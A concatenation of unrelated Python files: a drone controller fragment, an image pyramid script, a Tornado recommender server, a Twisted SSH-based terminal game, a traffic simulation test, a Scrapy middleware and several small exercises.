else:
command = "cw 20"
if self.found == True:
navigate.take_three_flips()
with open("commands.txt", "a") as command_file:
command_file.write(command + "\n")
if found_mode and (is_lost or no_change):
navigate.take_three_flips()
found_mode = False
return is_there_a_bottle
def wait(self, delay: float):
# Displaying wait message (if 'debug' is True)
if self.debug is True:
print('Waiting {} seconds...'.format(delay))
# Log entry for delay added
self.log.append(Stats('wait', len(self.log)))
# Delay is activated
time.sleep(delay)
def get_log(self):
return self.log
# Controll Commands
def command(self):
self.send_command('command')
def takeoff(self):
self.send_command('takeoff', make_photo=True)
def land(self):
self.send_command('land')
def streamon(self):
self.send_command('streamon')
self.stream_state = True
self.video_thread = threading.Thread(target=self._video_thread)
self.video_thread.daemon = True
self.video_thread.start()
def streamoff(self):
self.stream_state = False
self.send_command('streamoff')
def emergency(self):
self.send_command('emergency')
# Movement Commands
def up(self, dist: int):
self.store_new_position("up_down", dist)
self.send_command('up {}'.format(dist), make_photo=True)
def down(self, dist: int):
self.store_new_position("up_down", -dist)
self.send_command('down {}'.format(dist), make_photo=True)
def left(self, dist: int):
self.store_new_position("right_left", -dist)
self.send_command('left {}'.format(dist), make_photo=True)
def right(self, dist: int):
self.store_new_position("right_left", dist)
self.send_command('right {}'.format(dist), make_photo=True)
def forward(self, dist: int):
self.store_new_position("forward_backward", dist)
self.send_command('forward {}'.format(dist), make_photo=True)
def back(self, dist: int):
self.store_new_position("forward_backward", -dist)
self.send_command('back {}'.format(dist), make_photo=True)
def cw(self, degr: int):
self.store_new_position("clockwise_angle", degr)
self.send_command('cw {}'.format(degr), make_photo=True)
def ccw(self, degr: int):
self.store_new_position("clockwise_angle", -degr)
self.send_command('ccw {}'.format(degr), make_photo=True)
def flip(self, direc: str):
self.send_command('flip {}'.format(direc))
def go(self, x: int, y: int, z: int, speed: int):
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
# Set Commands
def set_speed(self, speed: int):
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
self.send_command('wifi {} {}'.format(ssid, passwrd))
# Read Commands
def get_speed(self):
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
self.send_command('time?', True)
return self.log[-1].get_response()
def get_height(self):
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
self.send_command('tof?', True)
return self.log[-1].get_response()
def get_wifi(self):
self.send_command('wifi?', True)
return self.log[-1].get_response()
def store_new_position(self, axis, distance):
"""
Appends current values to the history position
"""
height_to_append = self.up_down[-1]
length_to_append = self.forward_backward[-1]
width_to_append = self.right_left[-1]
angle_to_append = self.clockwise_angle[-1]
if axis == "up_down":
height_to_append += distance
elif axis == "forward_backward":
length_to_append += distance
elif axis == "width":
width_to_append += distance
elif axis == "angle":
angle_to_append += distance
self.up_down.append(height_to_append)
self.forward_backward.append(length_to_append)
self.right_left.append(width_to_append)
self.clockwise_angle.append(angle_to_append)
def get_current_position_string(self):
"""
Forms a string describing current position
"""
up_down = self.up_down[-1]
forward_backward = self.forward_backward[-1]
right_left = self.right_left[-1]
clockwise_angle = self.clockwise_angle[-1]
# I chose ":" as a delimiters instead of "-", because there can be a "minus" sign in a number
return "{}:{}:{}:{}".format(up_down, forward_backward, right_left, clockwise_angle)
def print_with_time(text):
current_time = time.time()
print("{} - {}".format(text, current_time))
|
import os
import subprocess
import sys
import math
import string
import shutil
import json
import re
import shutil
# build pyramid from an input image
# return an array of level file names
def pyramid(input_file_path, num_levels):
filter = 'Lanczos';
blur = .9891028367558475;
# magick
if(not shutil.which("magick")):
raise ValueError('need magick on your path; see https://www.imagemagick.org/');
magick = "magick";
# names
[file_path, input_file_name] = os.path.split(input_file_path)
name_parts = input_file_name.split('.');
if(len(name_parts) != 2):
raise ValueError('illegal input name:' + input_file_name);
base_name = name_parts[0];
type_name = name_parts[1];
level_file_names = [];
for level in range(num_levels):
level_file_name = file_path;
if(file_path != ''):
level_file_name = level_file_name + '/';
level_file_name = level_file_name + base_name + '_' + str(level) + '.' + type_name;
level_file_names.append(level_file_name);
# compute
resize = 100.0/pow(2, level);
downsample_command = magick + ' ' + input_file_path + ' -colorspace RGB -filter ' + filter + ' -define filter:blur=' + str(blur) + ' -resize ' + str(resize) + '%' + ' -compress none ' + ' -colorspace RGB ' + level_file_name;
os.system(downsample_command);
# done
return level_file_names;
|
import sys
import asyncio
import aiohttp
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.queues import Queue
from yamlparams.utils import Hparam
from loguru import logger
from models.implicitALS.dataloader import Loader
from models.implicitALS.singleton import SharedModel
from http_utils import recs, updating, misc
from database.connect import Connect
#DEVELOPMENT
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
def make_app(config,loader,queue):
base_recs_config = dict(SharedModel=SharedModel,
config=config)
urls = [('/topPopular', recs.TopPopularRecommendationHandler, dict(loader=loader, **base_recs_config)),
('/explorations', recs.ExplorationRecommendationsHandler, dict(loader=loader,**base_recs_config)),
('/recommend', recs.RecommendHandler, dict(loader=loader, **base_recs_config)),
('/similarItems', recs.SimilarItemsHandler, base_recs_config),
('/personalSimilarItems', recs.PersonalSimilarItemsHandler, base_recs_config),
('/internal/rateItem', updating.RateItemHandler, dict(queue=queue,**base_recs_config)),
('/internal/recalculate', updating.RecalculateHandler, dict(loader=loader, **base_recs_config)),
('/healthcheck', misc.HealthcheckHandler)]
return Application(urls)
def make_log(config):
"""Configure loguru.logger to special log files:
logger.info writes to logs/CONFIG.READ-usage.log
decorator @logger.catch writes errors to logs/CONFIG.READ-error.log
logger.debug writes to logs/CONFIG.READ-server.log
Args:
config (Hparam): current config
"""
logger.add('logs/' + config.name + '-server.log', filter=lambda record: record["level"].name =='DEBUG')
logger.add('logs/' + config.name + '-usage.log', filter=lambda record: record["level"].name == 'INFO')
logger.add('logs/' + config.name + '-error.log', filter=lambda record: record["level"].name =='ERROR')
async def async_test(delay):
await asyncio.sleep(delay)
async with aiohttp.ClientSession() as session:
async with session.get('http://localhost:5000/internal/recalculate') as response:
await response.text()
@logger.catch
def rate_item(model,obj):
model.rate_item(*obj)
async def consumer(queue):
while True:
obj = await queue.get()
model = SharedModel().shared_model
logger.info(f"processing obj in queue, size {queue.qsize()}")
rate_item(model,obj)
logger.info(f"obj finished in queue, size {queue.qsize()}")
queue.task_done()
@logger.catch
def main():
if len(sys.argv) < 2:
raise AttributeError('Use config name to define model config')
cfg_path = sys.argv[1]
config = Hparam(cfg_path)
db_config = Hparam('/app/database/config.yaml')
make_log(config)
connect = Connect(db_config.user, db_config.password, db_config.host, db_config.database)
loader = Loader(config.site_id,connect)
queue = Queue()
app = make_app(config,loader,queue)
app.listen(5000)
logger.debug(f'server started')
IOLoop.instance().spawn_callback(async_test, delay = 5)
IOLoop.instance().spawn_callback(consumer, queue = queue)
IOLoop.instance().start()
logger.debug(f'server ended')
if __name__ == "__main__":
main() |
import math
class DutyCycle:
def __init__(self, goal_temp, duration, outside_temp=75, wind=0):
self.temp_difference = goal_temp - outside_temp
self.duration = duration
self.wind = wind
self.goal_temp = goal_temp
self.outside_temp = outside_temp
self.duty_prop_max = min(1.0, self.temp_difference / 250.0)
self.duty_prop = 0.5 * self.duty_prop_max
self.count = 0
self.error = 0.0
def sigmoid(self, x):
"""
src: stackoverflow.com/questions/3985619 Neil G's answer
"""
if x >= 0:
z = math.exp(-x)
return 1 / (1 + z)
else:
z = math.exp(x)
return z / (1 + z)
def process_pid_output(self, pid_output):
sigOutput = self.sigmoid(pid_output)
if abs(pid_output) < 5: # Throw out windup and outliers
self.count += 1
self.error += 0.5 - sigOutput
if self.count == 10: # number to average over
self.duty_prop_max -= (self.error * self.duty_prop_max / 10)
print("dutycycle.py: resetting max duty cycle to {}. Accum'd. error was: {}".format(
self.duty_prop_max, self.error))
if self.duty_prop_max > 1:
self.duty_prop_max = 1
elif self.duty_prop_max < 0.1:
self.duty_prop_max = 0.1
self.error = 0
self.count = 0
cur_duty_prop = sigOutput * self.duty_prop_max
self.duty_prop = cur_duty_prop
return self.duty_prop
def get_durations(self):
on_time = self.duty_prop * self.duration
off_time = self.duration - on_time
return (on_time, off_time)
def __str__(self):
on, off = self.get_durations()
ret = "Duration: {}\nMax Proportion: {}\nCurrent Duty Proportion: {}\nGoal Temp: {}\nOn Time: {} Off Time: {}".format(
self.duration,
self.duty_prop_max,
self.duty_prop,
self.goal_temp,
on,
off)
return ret
|
f = open('6_input.txt').read().split(",")
f = [int(x) for x in f]
for i in range(80):
f = [x-1 for x in f]
for j in range(len(f)):
if f[j] == -1:
f.append(8)
f[j] = 6
answer = len(f)
print(answer)
|
class MinCostToConnectAllPoints:
"""
https://leetcode-cn.com/problems/min-cost-to-connect-all-points/
"""
def minCostConnectPoints(self, points: List[List[int]]) -> int:
|
# encoding: utf-8
import os, uuid, time
import urwid
from urwid.raw_display import Screen
from zope.interface import Interface, Attribute, implementer
from twisted.application.service import Application
from twisted.application.internet import TCPServer
from twisted.cred.portal import Portal
from twisted.conch.interfaces import IConchUser, ISession
from twisted.conch.insults.insults import TerminalProtocol, ServerProtocol
from twisted.conch.manhole_ssh import (ConchFactory, TerminalRealm, TerminalUser, TerminalSession, TerminalSessionTransport)
from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
from twisted.conch.ssh.keys import EncryptedKeyError, Key
from twisted.cred import error as credError
from twisted.python.components import Componentized, Adapter
from twisted.internet.task import LoopingCall
from twisted.internet import reactor, defer
from datetime import datetime
from rpg_game.gui import GUI
from rpg_game.gui import PALETTE
from rpg_game.master import Master
from rpg_game.constants import *
class IUrwidMind(Interface):
ui = Attribute('')
terminalProtocol = Attribute('')
terminal = Attribute('')
avatar = Attribute('The avatar')
def push(data):
"""Push data"""
def draw():
"""Refresh the UI"""
def on_update():
"""Update cycle"""
class UrwidUi(object):
def __init__(self, urwid_mind):
self.mind = urwid_mind
self.toplevel = GUI(self, self.mind)
self.palette = PALETTE
self.redraw = False
self.screen = TwistedScreen(self.mind.terminalProtocol)
self.loop = self.create_urwid_mainloop()
def on_update(self):
self.toplevel.on_update()
self.redraw = False
def create_urwid_mainloop(self):
evl = urwid.TwistedEventLoop(manage_reactor=False)
loop = urwid.MainLoop(self.toplevel, screen=self.screen,
event_loop=evl,
unhandled_input=self.mind.unhandled_key,
palette=self.palette)
self.screen.loop = loop
loop.run()
return loop
def disconnect(self):
self.toplevel.disconnect()
def restart(self):
self.toplevel.restart()
class UnhandledKeyHandler(object):
def __init__(self, mind):
self.mind = mind
def push(self, key):
if isinstance(key, tuple):
pass
else:
mind_handler = getattr(self, 'key_%s' % key.replace(' ', '_'), None)
if mind_handler is None:
screen_handler = self.mind.ui.toplevel.handle_input
if screen_handler is None:
return
else:
return screen_handler(key)
else:
return mind_handler(key)
def key_ctrl_c(self, key):
self.mind.disconnect()
def key_ctrl_p(self, key):
self.mind.restart_ui()
implementer(IUrwidMind)
class UrwidMind(Adapter):
unhandled_key_factory = UnhandledKeyHandler
def __init__(self, original, master):
super().__init__(original)
self.master = master
self.ui = None
self.key_map = KEY_MAP
self.last_frame = time.time()
@property
def avatar(self):
return IConchUser(self.original)
@property
def player(self):
if self.avatar.uuid in self.master.players:
return self.master.players[self.avatar.uuid]
return None
@property
def screen_size(self):
return self.ui.screen.get_cols_rows()
def set_terminalProtocol(self, terminalProtocol):
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
self.unhandled_key_handler = self.unhandled_key_factory(self)
self.unhandled_key = self.unhandled_key_handler.push
self.ui = UrwidUi(self)
self.draw()
def push(self, data):
if self.ui:
self.ui.redraw = True
self.ui.screen.push(data)
def draw(self):
self.ui.on_update()
self.ui.loop.draw_screen()
def on_update(self):
if self.ui and self.ui.redraw:
self.draw()
def disconnect(self):
self.master.disconnect(self.avatar.uuid)
self.terminal.loseConnection()
self.ui.disconnect()
self.ui = None
def restart_ui(self):
self.master.disconnect(self.avatar.uuid)
self.ui.restart()
class TwistedScreen(Screen):
"""A Urwid screen which knows about the Twisted terminal protocol that is
driving it.
A Urwid screen is responsible for:
1. Input
2. Output
Input is achieved in normal urwid by passing a list of available readable
file descriptors to the event loop for polling/selecting etc. In the
Twisted situation, this is not necessary because Twisted polls the input
descriptors itself. Urwid allows this by being driven using the main loop
instance's `process_input` method which is triggered on Twisted protocol's
standard `dataReceived` method.
"""
def __init__(self, terminalProtocol):
# We will need these later
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
super(TwistedScreen, self).__init__()
self.colors = 16
self._pal_escape = {}
self.bright_is_bold = True
self.register_palette_entry(None, 'white', 'black')
urwid.signals.connect_signal(self, urwid.UPDATE_PALETTE_ENTRY,
self._on_update_palette_entry)
# Don't need to wait for anything to start
#self._started = True
self._start()
# Urwid Screen API
def get_cols_rows(self):
"""Get the size of the terminal as (cols, rows)
"""
return self.terminalProtocol.width, self.terminalProtocol.height
def draw_screen(self, maxres, r ):
"""Render a canvas to the terminal.
The canvas contains all the information required to render the Urwid
UI. The content method returns a list of rows as (attr, cs, text)
tuples. This very simple implementation iterates each row and simply
writes it out.
"""
(maxcol, maxrow) = maxres
#self.terminal.eraseDisplay()
lasta = None
for i, row in enumerate(r.content()):
self.terminal.cursorPosition(0, i)
for (attr, cs, text) in row:
if attr != lasta:
text = b"%s%s" % (self._attr_to_escape(attr).encode("utf-8"), text)
lasta = attr
#if cs or attr:
#print(text.decode('utf-8', "ignore"))
self.write(text)
cursor = r.get_cursor()
if cursor is not None:
self.terminal.cursorPosition(*cursor)
# XXX from base screen
def set_mouse_tracking(self, enable=True):
"""
Enable (or disable) mouse tracking.
After calling this function get_input will include mouse
click events along with keystrokes.
"""
if enable:
self.write(urwid.escape.MOUSE_TRACKING_ON)
else:
self.write(urwid.escape.MOUSE_TRACKING_OFF)
# twisted handles polling, so we don't need the loop to do it, we just
# push what we get to the loop from dataReceived.
def hook_event_loop(self, event_loop, callback):
self._urwid_callback = callback
self._evl = event_loop
def unhook_event_loop(self, event_loop):
pass
# Do nothing here either. Not entirely sure when it gets called.
def get_input(self, raw_keys=False):
return
def get_available_raw_input(self):
data = self._data
self._data = []
return data
# Twisted driven
def push(self, data):
"""Receive data from Twisted and push it into the urwid main loop.
We must here:
1. filter the input data against urwid's input filter.
2. Calculate escapes and other clever things using urwid's
`escape.process_keyqueue`.
3. Pass the calculated keys as a list to the Urwid main loop.
"""
self._data = list(map(ord, data.decode("utf-8")))
self.parse_input(self._evl, self._urwid_callback, self.get_available_raw_input())
# Convenience
def write(self, data):
self.terminal.write(data)
# Private
def _on_update_palette_entry(self, name, *attrspecs):
#print(f"Updating {name} palette: ", attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
# copy the attribute to a dictionary containing the escape sequences
self._pal_escape[name] = self._attrspec_to_escape(
attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
def _attr_to_escape(self, a):
if a in self._pal_escape:
return self._pal_escape[a]
elif isinstance(a, urwid.AttrSpec):
return self._attrspec_to_escape(a)
# undefined attributes use default/default
# TODO: track and report these
return self._attrspec_to_escape(
urwid.AttrSpec('default','default'))
def _attrspec_to_escape(self, a):
"""
Convert AttrSpec instance a to an escape sequence for the terminal
>>> s = Screen()
>>> s.set_terminal_properties(colors=256)
>>> a2e = s._attrspec_to_escape
>>> a2e(s.AttrSpec('brown', 'dark green'))
'\\x1b[0;33;42m'
>>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
'\\x1b[0;38;5;229;4;48;5;164m'
"""
if a.foreground_high:
fg = "38;5;%d" % a.foreground_number
elif a.foreground_basic:
if a.foreground_number > 7:
if self.bright_is_bold:
fg = "1;%d" % (a.foreground_number - 8 + 30)
else:
fg = "%d" % (a.foreground_number - 8 + 90)
else:
fg = "%d" % (a.foreground_number + 30)
else:
fg = "39"
st = "1;" * a.bold + "4;" * a.underline + "7;" * a.standout
if a.background_high:
bg = "48;5;%d" % a.background_number
elif a.background_basic:
if a.background_number > 7:
# this doesn't work on most terminals
bg = "%d" % (a.background_number - 8 + 100)
else:
bg = "%d" % (a.background_number + 40)
else:
bg = "49"
return f"{urwid.escape.ESC}[0;{fg};{st}{bg}m"#{urwid.escape.ESC}[0m
class UrwidTerminalProtocol(TerminalProtocol):
"""A terminal protocol that knows to proxy input and receive output from
Urwid.
This integrates with the TwistedScreen in a 1:1.
"""
def __init__(self, urwid_mind):
self.urwid_mind = urwid_mind
self.width = 80
self.height = 24
def connectionMade(self):
self.urwid_mind.set_terminalProtocol(self)
self.terminalSize(self.height, self.width)
def terminalSize(self, height, width):
"""Resize the terminal.
"""
#Resizing takes a lot of resources server side, could consider just returning here to avoid that
self.width = width
self.height = height
self.urwid_mind.ui.loop.screen_size = None
return
self.terminal.eraseDisplay()
self.urwid_mind.draw()
def dataReceived(self, data):
"""Received data from the connection.
This overrides the default implementation which parses and passes to
the keyReceived method. We don't do that here, and must not do that so
that Urwid can get the right juice (which includes things like mouse
tracking).
Instead we just pass the data to the screen instance's dataReceived,
which handles the proxying to Urwid.
"""
self.urwid_mind.push(data)
class UrwidServerProtocol(ServerProtocol):
def dataReceived(self, data):
self.terminalProtocol.dataReceived(data)
class UrwidUser(TerminalUser):
"""A terminal user that remembers its avatarId
The default implementation doesn't
"""
def __init__(self, original, avatarId):
TerminalUser.__init__(self, original, avatarId)
self.avatarId = avatarId
self.uuid = uuid.uuid4()
class UrwidTerminalSession(TerminalSession):
"""A terminal session that remembers the avatar and chained protocol for
later use. And implements a missing method for changed Window size.
Note: This implementation assumes that each SSH connection will only
request a single shell, which is not an entirely safe assumption, but is
by far the most common case.
"""
def openShell(self, proto):
"""Open a shell.
"""
self.chained_protocol = UrwidServerProtocol(
UrwidTerminalProtocol, IUrwidMind(self.original))
TerminalSessionTransport(
proto, self.chained_protocol,
IConchUser(self.original),
self.height, self.width)
def windowChanged(self, dimensions):
"""Called when the window size has changed.
"""
(h, w, x, y) = dimensions
self.chained_protocol.terminalProtocol.terminalSize(h, w)
def eofReceived(self):
IUrwidMind(self.original).disconnect()
def execCommand(self, proto, cmd):
print("Error: Cannot execute commands", proto, cmd)
self.openShell(proto)
#raise econch.ConchError("Cannot execute commands")
class UrwidRealm(TerminalRealm):
"""Custom terminal realm class-configured to use our custom Terminal User
Terminal Session.
"""
def __init__(self):
self.mind_factories = {b"new" : UrwidMind}
self.master = Master()
self.minds = {}
self.time = time.time()
self.update_loop = LoopingCall(self.on_update)
self.update_loop.start(UPDATE_TIMESTEP)
def on_update(self):
#update cycle
#note: user inputs that do not imply a change of the game state (i.e. changing menu currently viewed) are handled on the mind push function, and drawn immediately (only for the user)
t = time.time()
deltatime = t - self.time
self.master.on_update(deltatime)
# #then update each mind, that updates each ui if necessary
for k, mind in self.minds.items():
if mind.player and mind.player.location.redraw and t-mind.last_frame >= FRAME_RATE:
mind.ui.redraw = True
mind.on_update()
for k, loc in self.master.world.locations.items():
loc.redraw = False
if deltatime > 2*UPDATE_TIMESTEP:
print("SLOW", deltatime)
self.time = time.time()
def _getAvatar(self, avatarId):
comp = Componentized()
user = UrwidUser(comp, avatarId)
comp.setComponent(IConchUser, user)
sess = UrwidTerminalSession(comp)
comp.setComponent(ISession, sess)
mind = UrwidMind(comp, self.master)
comp.setComponent(IUrwidMind, mind)
if avatarId in self.master.players and avatarId != b"new":
player = self.master.players[avatarId]
mind.avatar.uuid = player.id
print("Resuming game", mind.avatar.uuid)
self.minds[mind.avatar.uuid] = mind
print(f"Connected {avatarId} at {mind.avatar.uuid}")
return user
def requestAvatar(self, avatarId, mind, *interfaces):
for i in interfaces:
if i is IConchUser:
if avatarId != b"new" and avatarId not in self.master.players:
return defer.fail(credError.UnauthorizedLogin(f"{avatarId} is not a valid game"))
elif avatarId != b"new" and avatarId in self.minds:
return defer.fail(credError.UnauthorizedLogin(f"{avatarId} is already logged in"))
return (IConchUser,
self._getAvatar(avatarId),
lambda: None)
raise NotImplementedError()
class GameServer(TCPServer):
"""docstring for GameServer"""
def __init__(self, port, factory):
super().__init__(port, factory)
def add_user(self, avatar):
username = avatar.uuid
self.factory.portal.checkers.add_user(username, "")
def create_server_factory():
"""Convenience to create a server factory with a portal that uses a realm
serving a given urwid widget against checkers provided.
"""
cred_checkers = [InMemoryUsernamePasswordDatabaseDontUse(new=b'')]
rlm = UrwidRealm()
ptl = Portal(rlm, cred_checkers)
factory = ConchFactory(ptl)
factory.publicKeys[b'ssh-rsa'] = Key.fromFile('keys/test_rsa.pub')
factory.privateKeys[b'ssh-rsa'] = Key.fromFile('keys/test_rsa')
return factory
def create_service(port):
"""Convenience to create a service for use in tac-ish situations.
"""
f = create_server_factory()
#return TCPServer(port, f)
return GameServer(port, f)
def create_application(application_name, port):
"""Convenience to create an application suitable for tac file
"""
application = Application(application_name)
svc = create_service(port)
svc.setServiceParent(application)
return application
|
print('Digite o salário-base do funcioário, que tem 5% de gratificação sobre o salário '
'e que paga 7% de imposto sobre o salário')
salario_base = float(input('Salário Base: '))
gartificacao = salario_base * (5 / 100)
salario_gratificado = salario_base + gartificacao
imposto = salario_base * (7 / 100)
salario_imposto = salario_base - imposto
total = salario_gratificado - salario_imposto
total1 = salario_base + total
print(f'O salário do funcionário é: {total1:.2f}') |
from .countries import Country, CountryModel
aus = CountryModel(Country.AUSTRALIA)
phl = CountryModel(Country.PHILIPPINES)
COUNTRY_RUNNERS = [
"aus",
"phl",
]
|
# -*- coding: utf-8 -*-
"""
@file simpleTest.py
@author Simon Box, Craig Rafter
@date 29/01/2016
test Miller's algorithm
"""
import sys, os
sys.path.insert(0, '../sumoAPI')
import fixedTimeControl
import HybridVAControl
import sumoConnect
import readJunctionData
import traci
from routeGen import routeGen
from sumoConfigGen import sumoConfigGen
import numpy as np
controller = HybridVAControl.HybridVAControl
# Define road model directory
modelname = 'simpleT'
model = './models/{}/'.format(modelname)
# Generate new routes
N = 500 # Last time to insert vehicle at
stepSize = 0.1
AVratio = 0
AVtau = 1.0
vehNr, lastVeh = routeGen(N, AVratio, AVtau, routeFile=model + modelname + '.rou.xml')
print(vehNr, lastVeh)
print('Routes generated')
# Edit the the output filenames in sumoConfig
configFile = model + modelname + ".sumocfg"
exportPath = '../../simple/'
if not os.path.exists(model+exportPath): # this is relative to script not cfg file
os.makedirs(model+exportPath)
simport = 8813
sumoConfigGen(modelname, configFile, exportPath, stepSize, port=simport)
# Connect to model
connector = sumoConnect.sumoConnect(model + modelname + ".sumocfg", gui=True, port=simport)
connector.launchSumoAndConnect()
print('Model connected')
# Get junction data
jd = readJunctionData.readJunctionData(model + modelname + ".jcn.xml")
junctionsList = jd.getJunctionData()
# Add controller models to junctions
controllerList = []
minGreenTime = 10
maxGreenTime = 60
for junction in junctionsList:
controllerList.append(controller(junction))
print('Junctions and controllers acquired')
# Step simulation while there are vehicles
vehIDs = []
juncIDs = traci.trafficlights.getIDList()
juncPos = [traci.junction.getPosition(juncID) for juncID in juncIDs]
flowLoops = [loopID for loopID in traci.inductionloop.getIDList() if 'upstream' in loopID]
T = 60.0 # period to calcFlow over
interval = int(np.round(T/h))
vehIDcode = traci.constants.LAST_STEP_VEHICLE_ID_LIST
flowSteps = np.empty([len(flowLoops), interval], dtype=str)
for loop in flowLoops:
traci.inductionloop.subscribe(loop, [vehIDcode])
i = 0
h = 2
scaling = float(h)/float(T)
qx = np.zeros_like(flowLoops)
while traci.simulation.getMinExpectedNumber():
traci.simulationStep()
# Calc qx continuously but only update control every h seconds
if traci.simulation.getCurrentTime()%(1000*h) < 1e-3:
for c in controllerList:
c.process(qx)
flowSteps[:, i%interval] = [traci.inductionloop.getSubscriptionResults(loop)[vehIDcode][0] for loop in flowLoops]
qx = [len(np.unique(x[x!=''])) * scaling for x in flowSteps]
i += 1
connector.disconnect()
print('DONE')
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from scrapy.http import HtmlResponse
import time
import random
from scrapy.downloadermiddlewares.useragent import UserAgentMiddleware
import requests
import json
user_agent_list = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 "
"(KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 "
"(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 "
"(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 "
"(KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 "
"(KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 "
"(KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 "
"(KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
"(KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 "
"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 "
"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
class RandomUserAgent(UserAgentMiddleware): # 如何运行此中间件? settings 直接添加就OK
def process_request(self, request, spider):
ua = random.choice(user_agent_list)
# 在请求头里设置ua
request.headers.setdefault("User-Agent",ua)
class CrawlDataSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class CrawlDataDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class SeleniumDownloaderMiddleware(object):
def __init__(self):
use_proxy =True
if use_proxy:
self.lasttime = time.time()
self.lastip = self.get_proxy()
# 可以拦截到request请求
def process_request(self, request, spider):
if spider.name in ['Central','WangyiCaijing']:
t = time.time()
